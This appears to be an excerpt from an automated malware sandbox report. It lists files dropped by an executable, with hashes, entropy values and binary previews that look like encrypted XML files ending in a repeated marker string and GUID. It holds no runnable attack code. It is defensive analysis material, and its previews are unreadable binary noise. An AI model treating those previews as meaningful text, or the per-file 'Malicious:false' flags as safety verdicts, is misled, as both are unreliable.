              Preview:<?xml..z.......d..-..z..U..".pp&`....c.=UbY..;Q.B..$.^.....&qKc.!E#}<.d1k.P.C&.n.%...a...[..[.k..:?..V..6..)......KU.r......Ri..l....E...&.T.o.<..w..,...*.H/.+..7]..l..a...|...H.P..RW....._..g...}.xS..a..]..2.%..g.c.....(...G.....d .....@......J.m1^.i.....]o<*.=..;=...7...7.7.`....}.T..}<...9....d...w.n..........`.%n.e...:b..........46B.............<M....>G..Q.+.}.t.v.q{%.(.....*.e.Vp.R&_....F..({.CD.*..j.u...R.<h.S@.@..;....yn./..g.-3.[W...........d.{_...}.\..(.l.n....R...N.F...y@e..V..D.^2...R.._....a.q.,...q.Y..).:....6.bR.J.}..+s9NR.#t..d...qw%.b...p.pa.w^.tI..Z...Zz.4....;z.&...!..q..o.g...}|.7.,...E~=...%.ol.?&...E.m...}\.9...4..y!..: .Yt...3..V..I){....w.....V..A.......e.>~?eE.L...'.y.c.o.|i^...L.^..-.b3..._.,.TI.o...E..&....d.5b+.mq\.........e...!.il#....Y.........F......8......R+.M..H\..5......O{.-..^.Q..p%..G.l.>..0X..J^Z..9...),~...r:..-e....%...ot........(.....1 ..!\W.$...J..........!K-...7..._\d..v.|.?.7.+.F....0.....A
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1664
              Entropy (8bit):7.88718494185568
              Encrypted:false
              SSDEEP:48:efJwvtSZehPF/TB6BHg/BhT2KfX3CRxspzBpD:eYjhPF/EBHySUiRxsplB
              MD5:C72F532E0D7A43F92A11C6E1010F7ED6
              SHA1:F09C77F6255D916B1DF4E87DE7CE0707F9407AC0
              SHA-256:81C14B08B2EDD43EF01B23A766D76B2E2E993010A9BDBDB6B0A96D27A3B87AA6
              SHA-512:7227AA806988C9EDDE696D7054BEBE1173C3836FD8CB5DA312FB0962FE43D2E7C3C3A8F7611995286C52F0834AC016FF21CF101437B54260F5F0FB76CE05232E
              Malicious:false
              Preview:<?xml.?..|#.c9....~.s.4...L:..k..r.z7?...m .e...Q.....^....O...W....0.L...M/&./I....b../2./..o.........Zp.L,I...@.d.n/JnTS.`..P g....7J..][G....kd.....#5R.}6.-..B.~..F..<T..R~.K......B(.[.J.x..e. ..4R..K..3......%.d[~aH..i.N.'&3.k..w......Xx.'..f....H..r.......b..w>N...z.yY.9B(...HI....8F....1a.V.0....-...)K;^.'.......<;C]^rB9.8..MppV....Yq..Z.xJ.|.{..9.)......3.wR{.g[.B2.[V.\@Z......I<.+.v.[..V..*Q.....u......C..{sHD.n9..#.=..4.._....U.GJ...D......v..'...9E'..L..(<..p.[...RO...U.p{0e.u..*..;..!.m..a.._.:...&w...e..n}...v...1...t@k..kr.[...)...........6gj....}.62....../.9."sy.!....'K.U."..*..w..z.O....&tp...1.lj...0.GF;.u....+....n>........O.~...u....o.mEQ.H.C...ij...O...*..7...q]/../.J....K....0..1:..=.26....Kx|.u..b..R..=P.Y`oVW.H...j..x.w#Cg,.i.f9z..<.P.@...V_.a.,..C...e......*WW..yv.%.i.:.<.J..0....N8.#%.s.....r..._....,..1SFX..e.zh._.e....T.d....P...{.a.[J..-<........gN...Y...C.'2>.<.].?.':(K..:.=..J.$...'.....r..Ue.(.%.../Wo..~z.FD9|.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):4121
              Entropy (8bit):7.955978371762643
              Encrypted:false
              SSDEEP:96:wme28Mh/LEoxsHpS3GXQYw8Ul2SnDvwyJWJ7:I2HhIiYpS3qQYnft7
              MD5:BF91D476219DB819919E26F07BE73D56
              SHA1:2C7777E7D0FF9BA843931B62321D47F0942A9ADA
              SHA-256:F6B89411ED43FAC739B2C93BF907ECE162D13BA8F22AD87431C42223F286F29C
              SHA-512:31ED3E0546C7930809F96AF64D5E6BDA69D7A9FE40400210CCE8635391D358F02B1809A6733951994066E28A758E1B6D30CAB2554FCEDA93384721754148DE33
              Malicious:false
              Preview:<?xmlr.n....d.j.X.i/...CN....\%.G...n%...7..:.........P\.......'...*.gR...Z.0.......zs8[@4...}.......?........X.......&sP....k...r..nI..%..De6}0fy/...i...N....l.;<i...!.F..H..E?G-$.6..2......V1.(yP..}/..x.."T&^dir.Q.....k...[<..^.h.!....ew.G.....>..I.t.tS<....TC.?..7........$.lf......{..#....H.....kU....JpkE./..,i......8...rY].9.c..yxLD..../...N....Nk..D.e,eS.nxp......b.r...y... s.....cG.<..v..w..+k.LR...Y.u?.2...z..bJ.n.qx..[...-.-.R..8;X.0xS...V.(..U...C......MWs.2Sj....[.B..V......r.&..l.R..1~#>..eN..u{.%.n..8|.0.G....8u...';).9{t.0.=.W..RFV..m..f..e.....v.....C..2...........H..f.P.>9l41.Y..;.1U....."...c`....O]....#.?...'.9.. u:..LT7O...ysJK..1.?...n.BBx...fg...(.i2.....q.0yl|..m..&.H....{....aa......Y>c|.eo..I...>$.....]v..u..(...6.q.w..%M.%..kp.|6/..B....P......(r....M.X.9.g..V..fMQFy....x.`.5..I.h&a...R'w........6....e..*(.Z....7.....e.....'B.a.n.c.[$.,:.x:.'.w5.F...gJ..6...t.Xz$L..0s.Q..w./.l.h.%.._."....4../..O...F...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):3314
              Entropy (8bit):7.948418202579383
              Encrypted:false
              SSDEEP:96:8ai8LXGqcqB37gd/Z/iF/L8m8cXFYim/e/Xhonmq:l9WkrglZ6RV8cQe/XI
              MD5:745AF20FF7F2466008C7DDA2E0B1AADC
              SHA1:F49C99B06021C980DBFF20117F201D8A16100D8D
              SHA-256:3630000FA2594244FE998993A60A808364BD9B82DF79F44211CBE27B6FB4F755
              SHA-512:6F850BEF3AF17546EC51F34D20F6F2E3F1C45C3A864C6F2D226DCC62EECB8898058A2D46C31C10DDFB30921BFD5C473FBFF5F1DAC237CA728E449FBC4C68F1A8
              Malicious:false
              Preview:.<?.y..W.`1..Q-.S...G@.).E.t."k..?@6._..R..n..E....F|a.......)}..{..K..........o)...s.m:&..'`a.,.ZgE*.......D.....m.).z....O..T...y...b&......(....!q....1.8...h..I.7...0z.?../.`r).g..WB...z.bD}....6.Du..W..2...B...R.p.b%.x..A..X9..N........TO%.....G.cQ=.\......C!o.]......V.^f.N.&1.a.y.S.y..a.*..4...4.....U..!W.o.o..#......\O.....>..M...$.H.4/m..<.5b......I.G.....L...y..W.j".21.b(l......O...iq..Kp.o....Y..d4.).}...%...J%.~.`y}$......h...uZz..4n..(C..g..n.CBD...g....R..3Q.v....ncl...,%.T.. i....dVT....Dr}.......n.._..@.Q....J")C..Z.y5..O.`...mQn.........f..)..#....Tf~).}.s4d..)M..Lrw_..{...[\y.O...!&.g.#.8r".Ds]].F..........I....f..IQ.K........(...sO.O.... ..&?.?...u....1f.G..c...;P...vh]5.@P..%D.[.p.@.....o..3..^.p...R<........../h7.w2([.{e<M..Au..B%k.....:.#S|.Y.1..'.ym.-...^7...Cw..........f..E...^..r..CP.6........g......t.....&./...y....y.A.....TB{.+%7..v.[x.._.f..R+G*....k69...rJ0..V....{...c7.jU...yi.3....&.!..,_.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2494
              Entropy (8bit):7.914681787302314
              Encrypted:false
              SSDEEP:48:CWYjHRJQtTrtjwqSo6ehjbSnoxzzPM9QLMDU5QIJj0IVqSkk1ud2D:DYjHRJQdWlo3jbMKzmQLMAKIJEu1uI
              MD5:43753719B912272A3C3CE3A78129369E
              SHA1:D83EEA306538BF6D66C39AA2A1F91F6DB7A26AE0
              SHA-256:2AAF6877407B45AC27B15BEF3C8A7D93D0940904B76AA2540C9FBD6778934EFC
              SHA-512:BA132AF897254B8120559199C78A8651E18715ECB836CFAF114C7ED06D021593498CE30ABA7DAE22DED6E2DF10D6C88F9C7CF9DD94A5A32D3778EA4B5CAE672E
              Malicious:false
              Preview:.<?...j...$..g....K.tfd).L.1...#2RA...^C.h.T....5...2.7m.~.e.....Zu<...l....=....0...R.=3.;...U........w.J.x.`..gap..r...+R..=.{..,./...^%.+5S......Cjb...... $.....L=.I....*.J....R... .M.D...Z......_..Lj.<......`.fi).KkN]...J..p.....E.v|.c".......V..Q,iA..a...-.....qvj...<..}.....|I9.1.....w...I.]* ..mw...*....I...XH(...I).].Q.v.....*...*..y....H...A....1.d.W......`p.Ye6.N8K..{A.6X~ck.}X.uP...CKOtN.:.=b..}.....F...3.]9X...Am.~.........8.?'.(b..t.;.@y.....R.'~..FT.."..f.......[.|.....R.Q.~..hP..0-"E.@)F@..='"k.........6......d.H....vh...8.2....Z....u...F.k.P.C.B..*....K^!H<S.... T.?Q.B.O....2.5'....s'_.s[..[..?(.O.....9...Xs....`..?zy.... ..7(.q.A. 2@>.t..b...k.x3...z.>....9.nM.(7EL...0..\p.....[qw...d....!WE~.%..R.....0...0;....c*.g.{m'$.%....U.1|.z.;?F....$.R.f..u_..............p4....$..s.=....../.PW..<8..*........G.j....9|....../.......u...!..<.C-.b^1....!...K..f...tS.+.n..O...@....E;..4~.h....}.l....S..=.\."O.\.....`Dw`..!..d.2W.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):742
              Entropy (8bit):7.727136786482146
              Encrypted:false
              SSDEEP:12:PWQyY5iBnH9egpB9kDQ6DUtFJAXztw/8ZSppPTwujj7BJWDoOTV+mNaMPukIciik:PhyY5EnDB+DaGztwrHPTwujj2Em4fbD
              MD5:258F8CDB6D89260F61A0B419FE6D2A59
              SHA1:B6748F6C0FB00E4272D1E838E4D1F95C371D003C
              SHA-256:99FD91D9B76CFBC7C09FAEDC9FAE82A8B0B600D3EB34BED6D0140F500DF24ADA
              SHA-512:2E36ED761A401EBD5DBE4F855BA12E50CD1F3322D413533B81BF064C9F92D0EE04DAE6BA2B2C4CA732CB996B2F4358904464F8388272F7BE9D4D9CE255844F95
              Malicious:false
              Preview:.<?..9..1..'..k1.......D|....k..].j.V..m.k$....N..)....H...^...?....33.....).x..r.&,..)o..~.?.4..:...r.......4..A......4.#.....(.:.aC9.o..U.uw.?...llY`.........k`3..\6.".mI..!.O.&F)N.G..x.$.."d`...>....)I;..bM]...>.+....#....O.1..*./p.....Ee@'.l.....85.Ta..l.......".F.....}.T....~2...7M..G....8.....mci...5HjT....W.a........S.j!.>...X........}Y.z.qH.P......_.\8.~.y...{....V.g9...m..6~.C.#....=[:..P_`..^.K..M..[....;p..^.n......8..8......ac.:4..}74..'4.+o).../YuzEjS.y.e.@m.D...3t.[.....L.`..,..;....zCaFR.....t....Z&..._.gG.P..m.Us./.,T&<.&l...R..b...4._.....T..S.F.Yc..._....xj.t2......6.LR.#Pj..-!VTCa.T...0.kh.......J..|.Gtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):776
              Entropy (8bit):7.699357323298543
              Encrypted:false
              SSDEEP:24:o6+hKkGnyTzHK1PGoBGI8dRiIAEkubLa/05tubD:7Tk3TedGoBGFQIAE5bLaEMD
              MD5:D99F7244A8FB0113338A3A03B296CFEA
              SHA1:579628235C6DEE70D5D3A6D75FEAC158C79D5A3D
              SHA-256:B61129F84E7F7585B0093051E2C081B686F68D881ECDC4F9E84AA6FD80AC136D
              SHA-512:8AD5AF4777AE4B5C941234988BFAF9C021B9079386E7FBDF2F70F33C087FF66B504C3121EDCE5EE8A5D24456F7DD96C157F0B52C700419B47D5D714BEE7D8795
              Malicious:false
              Preview:<?xml.C.P.2.d=Ye,m..V...TM.B.{v...R...I/+....8V7......V-...m.y\.%......w....#..KJ.2{y..%.....X..Y .}....Tl&.E.Gih....8....&....1...Wx.7.MA.p..,.n".Ki...O.tp_...p+.gMI..y..^\T.Cl.x.$.4.I.:..#.......j.....P...'L.u.7Ds....W..."..J.Oy...4..VB..~.....Rg.;.b..IJt...%....*Y.ax.<....~.l...c.q}..?F.....z...Z.G.....3\T.]..#^ .....dbU0x .;.p.....p..%.[z;.."i.;.t.!.5.9r....j..k.#.f...^.....H.l@.5F5.=...5.Y?........G7.X.lcA.q.UU..4.......n..e.Rt.{.N(.:.}.../<'K...#>9_<....S..W.lh]........d......1@..#.8%6.......0..v_..h]..UY.X...7vaw.....U.....5.....(q?..9..R.,.MP.u...9JH.J.8|#6.(..2.P.K..d.]n.....!-B..{.j0..Cynb...M|.!.....;..W.z.A...i.....p."......_...S.9.4.Md........tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2617
              Entropy (8bit):7.924151312247784
              Encrypted:false
              SSDEEP:48:v+CnfZjxtfOAJxPbH/MMAevoFOSHxK8EvEGz56PlF1RwlDItVQdxAkD:v1nfTtfOAXPb1dvoKxvEGMdR8HxAw
              MD5:757C586EBC16EE5BE5B8D42858153E11
              SHA1:5B88728ED6191D40926080F45CB3569A5C4DBD5C
              SHA-256:C44F235E43B73C6E9AE2F2974C1BA86EF1E63BA1C4DB090DA240F0C371DCEF38
              SHA-512:D922DEB87E8ED57066741F0341C0BBB937DA0FB70F1877CE54B152B85D92536A5DE8ABD9E7A90240138139415BBF62231E0603804F835EBF9E02C2DE4C7395F4
              Malicious:false
              Preview:<?xml8|r.....[...\....>."..0.......]..S7.....41oX......*....~J^.0..N[.....i.9........f0g8:.. w...........8Q!.E.M.....f.......c.P.V8..2....?..z.." u~.5./.f..=..;OL{.C.Q.*.o...){V..[[-x.>Al.|q........RZ.@w;u......Z..*..tu..;:X.B|..F.t...YMP..........5.mE..?...X^....j3&....hhj.......ii.U.....y.i^.....QAR....<M.....R.\.....3.......f..4M.. E.S.h2.!...K.T..l..;].[.i.7..;w..=....&.........?p...'.2..4"S.;N6.2o.j..k. ...)U...b.......J.*.s..[.qGG$....*T..E:Y.=..L...5.KG....X.,sP.B(4M.0.$.....N.....J..4GVU......L.........f...6.r....7......|P+./)...i.....G%D_ ..,m..../..G..a6G.o.6..b.1p....(..`.p.i.r.XX...2..=....i....F.aR.-....C,T~j..#...K9i...h..q.....h/.9.6...8........+..j...S9.!....f...r.9Y...T..x..f..U.....e\....a..j.._..9...T.....M....qyl'....O.OxfH.C;...x8;...a.h~...... .....I.AH...2c..!..N.6..]nB.>X...3...d!..9`1<R%.G.....u.Z..z7....T......z;_....s..r.w......r...S..2v........=..%HX.tM'....BT:D..9 .9|..QU...HYJ.....&..^..%=Ao.m!.W.M..j.\.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):783
              Entropy (8bit):7.669319649216061
              Encrypted:false
              SSDEEP:12:F+HTXLcaQeYTsp7mOE8QR+1yorT3XiZkl3+1yD7s+Q4rbiz2/EiECiuukIcii9a:YbLcNed7dEv+fb73XD7s+Qc+z2NErJbD
              MD5:5A492D4E513BD5E8633C5CD87B69368D
              SHA1:4D0A03AFD7CE2EB0B5551719AD713BDB3314B0AD
              SHA-256:2A4BD640CFA9CABA20A38D19739CAEA40E74F884D3949ECB9ECDE4D640B945EB
              SHA-512:B5652B59A4094179DCA757DEF9B4F4B9B1B880994FE136B108C755309DD1AEE000752E964F3CD72D5BDB872E7AA105607229F839F8FC02E38F328364B0504527
              Malicious:false
              Preview:<?xmlt....[.N.U)S...p.+C75.MQ.rM...\.K#....UBy.i....O..|.8.(...Gn..%.#..`W....\.U..u.......N/+@.....C....jo.CLS..%%..a6j..?.]......6.Rp..E?.$....I..W..(.8,.,...3s.....T....+.q..YA]d.x;2H......^>~e......b.ij.2...1..........}.b.|....D?A..{{..<..0N..g.v....2p.).Yn.Q..>._B.o.............p..]..F9R.&F.F...9l..pA.6h{.....n`...UB.,<Du..;...0 {..u..S. .........[y....|.12x...8......2!.H..}..sqG...|...'..ei...hQ.j\.y...R....l.ZH.......I+=.Zz...=.+...g.........(..w.....d...BT...+1|.....Im..~Es-....+kP.P.u..<,.IT...p..s...M..|Hy..I.h..4.=.i]./.a.A.U.Y$i......h....+.RP...z...1.qN.......-j{..G&L.5..T).s.@..:..].0..........f.....l5D...E8..S.., .e...m.G..;aE#..!.G.4%&.....{..R.b..mP..:tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):859
              Entropy (8bit):7.733296582019812
              Encrypted:false
              SSDEEP:24:nUw1O8wlvbcU2y5XeYNJyfVaChKEd/fBYaIxbD:nT2bsYN8Phrdx4D
              MD5:DC068A7F92FC6695F32B659FDBC967C4
              SHA1:69340BE491ABEDD77857242EACF366E79A12122C
              SHA-256:7F86BA01CBC1DCF9810AB91BC81294200CBF5EECCC73E2086538268BE9F23958
              SHA-512:2D30364139184BD02FD358972CBC3DCB050044E829AADA6046CE63EEC789493EB80A2B25A4A526CF70F3FFE2D884DCC85AE95FE235B9CB9052E6C17462CA4566
              Malicious:false
              Preview:<?xml...Q.......%.?W.<-...W.#=<+,%V..8[~..a.l..h.x.<.......B...f+] ..<F.......4.....F...s.#.^..~...^.........|.=.....w....:Ms....+....u6....}...=...V.. .f.P.....:7||.mprK.....?. m..`.....4R.R.Vp.d.`c...>.o..$`p.O...b..@..A.X&./**.G$?.}1[.q..4S...0..V.].I:.E<H M.|. .K.T...c...x..tTO.....i..b,...>..}g.5#....CBD..0&.......C.H*-.3...@"..x.....p-u?.....d2K..S3...._..t.a ..!.....Q......>a..g....mt....[|w...wh....u.*lo..i.a..AG!..V=..s.<..... I"..k..w...ix....b....o.%..7n.FW..\kt........7..)Xq...f..(..8~B.......m8.+...Z...[##.j...'..B......Z..?.|..@._.z...z..;.....O.aBc..p.<F.R....+E|...3......>v....lw.:&...P.U).Th..H...@.A.......C......H..0./.n.^......_.A.D{......^.<.;OAgc...j.@.|.....Y...T...:Q.x.I.$Ea..1..).}L.4..-......`?.._+...r.....(.FOtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):3147
              Entropy (8bit):7.946594499036935
              Encrypted:false
              SSDEEP:48:lykY68bSufufP/SjnarJJ+j4IZWxZkE8Jy/O0ZVpF7tKzbtW/yOKSiqCgAOuokta:s6ddHSDaI+E0ZtKzbkqOPkgxktId8nG
              MD5:8E3C0C534669E3C9BABAB3CD755333E4
              SHA1:6CC583A8FBF80B3F2F4E5F11AA9458A81BD748BA
              SHA-256:F243C5C6F5C224B318B7378E8CA9FB0377E2D86DF03564C8497A0B27F5845A81
              SHA-512:805AB1665250085F303828615B01CA633457E1C8D9301229DABC10D88B2B11AFF65B1D8A96AB3BC47B6EDFF8076E069CF9B73B7AAAA118D1296F8D1AED1DF1F1
              Malicious:false
              Preview:<?xmlv..i...W.)....!.....0.~....?.,.. .R....2......J.1.....GV.../'mr.m.v+-`.z....E...x..x..7..L.p.TS.....v...j$.f.^^2_..A..d.R.F.@.jK..]Ftu...c>YM.[,`.FK-~&2k..E..A...N... ..?.....{]..'D..S.F....%...I.&..5........[B..h;.:.*....(".....{<.......ww.r m...>..%...L.......w.........z.....z......u..T....h.#.+.....]?@l.......v.Ou.d.@.h...$...0..]F.v...n...<.]w.N.......X..z.{u..S...x...,.{{2,.u.P..]..F..d.d!.......D..~..'a......c.3.*.eRm*G[.T....]....X>.d..0+E................-.?.)..@...f....(SHO...F....s.5@.\..'...K.k...o.w..0~i.,...}....L...IA*....5._@....GU-tY...)..C....&...9..+*.w|H.p..l..IZ.j..x...4....S...Pr.5..D...sJ.j...L.s~@.kTU...c..@.....}?}..~...6....@......[..{.w..Y6.U.J.$...a.S..0%..".;/...-...t`X..r..).PL....._..WGj...u...Gpz.....I.P?..+u...A...{.._..A.B.u>.FX7~.....:.._&;.r..}........7..|.$.T.y...wg../.....w.2.S..<.b.t.6.`Pv8H..........>..Ne91.o.N......8.............Hq...u(.+/\. .#u.".lC..b.p.R..:.}J.jR%.Y.]r..l.*Q
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2237
              Entropy (8bit):7.9178850960693765
              Encrypted:false
              SSDEEP:48:/lO5EoGfsoTQ0mKYvlMWWQQ79+XMiThDzXljIhsw+zRft8toBY1eyC5D:/lqCsoD0N5690XlDzVjIhz+zRfCoMeP
              MD5:76CE3B5CCCE6A641883EA7DB795B054C
              SHA1:478F4C0D050BB1E97C2283CB6B209CF6C8404049
              SHA-256:BF3386F41ACA6EB71682829CE571DCDD55D11113025786A50703BBC52EE74286
              SHA-512:8AB53B6191B195EE60AEC7004E12E82DE8C36F3C388D8C605B86548E573666E960032F34068F00226CC680FE108FE614956CA8440DBD47035012BAA6F44F787A
              Malicious:false
              Preview:<?xml..s..'5...g...A.....91..%.$.*.?..(.f.-..7Q.)s......P...#.....;...W?..i.?5.od0...jn.H.....#.,(.p..+p...VN..Wa.2..;.a...t\...T........P.+.`.,.z.....p.H.............'...+6.~f..qe.m.....hA.G6..I.R"MX.{..=...m.fA....|L........q..^..K...us.G./....,/..D..i...o.....5.C.&.7..#%..E.}.3^c\X......\.g.'L."^.3...;...2;.AC&.!..............H..y0..y...........d....Q..RwoB.Qv"`.5.sV6]|.F.,.....i-......A..7..Bg.(..Y..^_.W.....x9.......@'.@...M.ql.~v".w.f.n....eD5` .......PI....D.[.$....M.Y{.j`@...lW0P..]..R..]..OG.yt.._.w.2j......1.#R..TmBo..0...d..O&f.c9.....z`.h2..7._...M&..#...\(.e.p..q {.u......=...S.......kO..~%.....[mh..`.o..z.:#.Q6.:.o......51].......d...[...@5.8.......w...H).Z.....zX.D......Vl)v`~.....a...l.C.f..g.....j....3......3.%J......_.._..o..N.}.4L6.L../. ..i.....L."6.i.d.<...y,.T.).1c..I.r.'...7.X.hH}..b.._12............=.[.yN/...Aj..~......,.......n.`.T..fW...L.......q.z..gwf.1.:.h.C...w.F......O...&..H=.{..+.r$.5.H<N..........
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1924
              Entropy (8bit):7.905333600093728
              Encrypted:false
              SSDEEP:48:QF3WKcu0pJqT69WxcrICfGd0JtlSKPlZD:IrYJE6drrfLtI+b
              MD5:8AFCDE55BA5B7CC8C8802E009F2AF6B5
              SHA1:FE15A2A0EAD8D29E151F85002DA761E1EA08AEC8
              SHA-256:6966A49203305727AF892D860CC8688382523A3C37A3AA048CB70CEF1DF151AD
              SHA-512:7D2847286D2F99CC4DF43787DA79AAC19BCC4A8F26ECE1DA725E0F133BD961E7B04B9F96281705BC6844A223CC884E6CCD5133A5B7D7DCA1E078CA5D371A9ADA
              Malicious:false
              Preview:<?xml......u#=.>....]:.M.sb.".|.Sqd...A.].7.I,.L.7."..a.?NF...%.....>5....\..w.X.8..|3D.._......x..z.f....1}..A>P$..b.8...@...E..U....+.Q.i..<...j.L=.;j....A3..y.B......@. '..o>R7...B)..V32%.....w..R..d.....R..9.[.....$.d.m....:ltWZrZ.v0D3.T./.a.v]....YO..x.Q...M.U3.."...pA^..6..L.....d.sr.?DOS...G...879...S..^.g*.-{.....!.]@.;.i......lw.;.!..G5.2....|.....L....e.~m.Rip.$..^...hQ.Q.^uKv....Z|b.......&....g.....j..}....W..$w..5w{$Zd1C&p.......}.=*..t...wx.....w..Z.&.e.4...e&..b.....8|.z.|\'..U.._F7..+.l.\.B....VNT.3.......(%...%..*...t'.~.xI+`...._m:Y....U....3.....j....D:U.=-3t...Q9.A..K.....9..?..d.....i.5..O*....g..G.A..M1r..".'..*4;..f.^.Y...g..} .p?.!(.N....{.FgJ..L..~.#....-K........p....wDzo1.k.X....t.:.rF4..R...m......p1...S...Ep.:.].e.....b!.:...a.0.|.G...K.3.d.^.?Az.....bF..z.....S...?;.<p...u..|...e=.K<4X..5y..c.......[.A...u..2Z......v..>.D.<..'l.XW.....)..|S.w. b.X!t.Oj...cN.)&R...H.k.....P.=]8...CrV.>..]x.P. .$.. .
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2020
              Entropy (8bit):7.906745612930143
              Encrypted:false
              SSDEEP:48:fAfw1D7ovjQ3NN2DAA0O6Jc8FBtLcDPzu6JKt4JjoD:fxX3NsDALJdFBtLcjzu90j0
              MD5:71F7D1C4D8ABCE3E481403B9E5E09DE0
              SHA1:A3A4BC4427FDC3D83474DED94B5200BB8527A170
              SHA-256:2B2684F77214585EF179B48F543A14552EF37FB8573228B17FFEEBAD16219359
              SHA-512:420BED75889CA750EB2193E4A9186C3AF19A34B92F8E1EEE5E4E40BC4BB4B8DFE7018A039162197D273DB58F92613827DAFAF0720C7569631506A2FEFE77361E
              Malicious:false
              Preview:<?xml.........A.0....P.\_..Sk.......\..}.=j..q..t.&PqY9..F.u.Z...N..0.~s......c(\w..Y^.T+_.H*....z.4.3..])..S.......MJ.i...N..v >...H..`C..:......#..o...]d.>...3..!Wo.jb.0.9.:.W...{.:'z.K.Sm..lA.I.cv..=.?<.}....z%..'..td6l.2.(c;.bq....j.K...CtO~...........g.aU...v*9..mY~...?.A.C...9g.]P.'U.t...J.dCA....i.....S...T...5.1+......F8..+..........6....S...'...K...|.I()....TF}.\#...>.wp8.!....`...0.....f{.O5......r...>.AX...r$&..:g[!.k../...a..%......:....J..Z...w...E..@.O... .2m%V>..z....(.n...^92j..6sQ............D...j..!.....$...@....Q...H~{..&.#.ZD.....R..8#.............~i..h.M.R..5."DI...C.....Mj.L.H..9..@^..7.b.@.B2....V..a.{...2......M.".]i............r..S...lp..Uy.=.o.@.Q...l..aE...\w...c^..KI}..."......v..x3.....:.... ..2.C..sn...'.W.........{. ...4....f....I....(..;..<^..7..]..>...7".RCY..G.T.j.....j..u"....8.Q....E.6.#.....qR......<"..'+.n......Kb.......a..+l.../53...L.uH.......q..sb..f<,F,-.....c.Q.....B...\U0..u..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1186
              Entropy (8bit):7.808710795714567
              Encrypted:false
              SSDEEP:24:LlvEmV7fbsAT3DfT55l1jI6YkTdXv0KzOagBdk/6G2GqJbD:xvEqfsmTlqkpMP5jk/6PpD
              MD5:F73B7E7DE9B49FED064762765CEB3141
              SHA1:304CC5BC079B6C134E4EDA543DEBA7AD50C6ADA0
              SHA-256:A9E97895FE903C2F08AFA78B1F1D44DEACE7C83F9A374C665F1F6739980B160D
              SHA-512:614BC10E08A39B55EE6B1988084FDF610DF95FD61DF08B2B5E7418D1FB9169BC0CE6ABBFF3729DEF34092962ED082B18AFB517981E3B53441B0A7A5D16140BD8
              Malicious:false
              Preview:<?xml.....]00.~.NE(..t_...R)..59b.+GC.6j.K......^P...g7...".5B....^.... 9.>.`......~....;.K.iv....y?.>...B....%.xW......m.bD....6.....?.e.S.[<..ol8.B..........{...nI.}]...oR...|..vta..E.{q,..3...m6....a.....=..A,...y.T...z.Zj]].$N.y.v.g..9#;.;HUER.Z....>m.d..(....X1..p^.....}<.f16..[........}...c2...N.....a<....A.F..l.b..........,..."..H............XQ4.,...."..m.P........Y27=.Hm.......:7.m.D.j|v|83.....dxG....mIZ8..z~...z.c!..><j.bG...8.7x-b...,.}.mi%...T*.k....x..ad..d.m..u~3..).P....T............o...0.@..+l8.`.%...=B.S%"........5.Z<.!..JO...fp.6.'..'ak.....o..N.. ..9.....5..*..Rm.z.YI..D.k....'.... ...N.rDUUC...mYa7.X.ws....*zn.....hu.|...Z..#-..i7?.m..X....H.u....^?.CAE...+..?~..T......F....UKV.DP.Z..-...A.vC...094...........j.j"z.....q.5(.`..:.(.i....IY.....C.....&.<.iZ...[..^'....7p.b...>.x.}..../2T...{z/.....!..I.....9......y............@..Y(..f....f..||-...<.G....*.....C....(.Bz...."......f1^)\..B.....6..Qf...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1182
              Entropy (8bit):7.823825432417727
              Encrypted:false
              SSDEEP:24:BgF8GaNLV8ZQSUIfrCG/phKTxecEPDdsqcwGswdivDN6UfIE7DsbD:B3GaNLe3ZrCG/SVE5sqhvoUP7DmD
              MD5:49EFCA64676FF335A6D517ACFFC36482
              SHA1:2464BEEB066ECFAA05C938E29080E3635DA71EEE
              SHA-256:06B071C44641DB5F141101C999F0EE59492F564F72CB8151EA6EE24759843642
              SHA-512:ADAC69659B53862CD9DE850EB48DF12EBF7A1F401233EE80E51A534584E2A6CAF3B60740C49B0E9E2F2A680B3C4B9AA4FF1C4E7F29C55594A35ED84DA2C8C5FA
              Malicious:false
